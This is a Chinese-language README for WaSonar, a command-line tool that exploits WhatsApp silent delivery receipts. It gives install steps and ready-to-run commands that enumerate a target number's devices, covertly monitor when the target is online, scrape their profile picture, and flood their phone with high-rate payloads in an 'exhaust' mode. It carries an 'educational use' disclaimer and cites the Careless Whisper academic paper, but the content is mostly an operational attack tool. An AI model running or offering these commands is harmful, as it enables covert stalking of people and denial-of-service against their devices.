免责声明:本工具仅用于教育目的和安全研究。开发者不对滥用行为负责。请负责任且合乎道德地使用。
WaSonar 是一个强大的 CLI 工具,专用于 WhatsApp 协议上的教育研究、设备追踪和压力测试。基于 Baileys 构建。
npm install -g wasonar-cli
npx wasonar-cli <command>
git clone https://github.com/AjayAntoIsDev/wasonar.git
cd wasonar
npm install
首先,你需要使用一个 WhatsApp 账号进行身份验证。
wasonar-cli login
扫描终端中出现的二维码。
列出目标号码连接的所有设备。
wasonar-cli devices <target-number>
# 示例:
wasonar-cli devices 919876543210
核心功能。发送静默探测以检测设备是否在线并测量延迟。
# 无限次探测(默认)
wasonar-cli online 919876543210
# 发送指定次数的探测
wasonar-cli online 919876543210 --probes 5
# 将结果保存到文件
wasonar-cli online 919876543210 --output ./logs
注意:PENDING/OFFLINE 表示服务器收到了消息,但目标设备未确认接收。
获取用户的个人资料图片和状态。
# 显示信息并下载个人资料图片
wasonar-cli profile 919876543210 --output ./profiles
⚠️ 仅限教育用途。 发送高频超大负载。
# 激进模式(默认:250 请求/秒,1KB 负载)
wasonar-cli exhaust 919876543210
# 缓慢模式(10 请求/秒,500B 负载)
wasonar-cli exhaust 919876543210 --aggression slow
# 设置持续时间
wasonar-cli exhaust 919876543210 --duration 30
WaSonar 使用“静默删除探测”来检测在线状态,而不会惊动目标。
delivery_receipt(状态 3)。基于“Careless Whisper”研究,该攻击利用了 WhatsApp 反应处理中的验证漏洞。
尽管无效的反应不会在目标手机上显示,但它们仍然会被接收和处理。
研究数据表明资源耗尽具有显著潜力:
基于 Gegenhuber 等人(维也纳大学及 SBA 研究机构)的研究:
@inproceedings{gegenhuber2024careless,
title={Careless Whisper: Exploiting Silent Delivery Receipts to Monitor Users on Mobile Instant Messengers},
author={Gegenhuber, Gabriel K. and G{\"u}nther, Maximilian and Maier, Markus and Judmayer, Aljosha and Holzbauer, Florian and Frenzel, Philipp {\'E}. and Ullrich, Johanna},
year={2024},
organization={University of Vienna, SBA Research}
}
由 AjayAnto 创建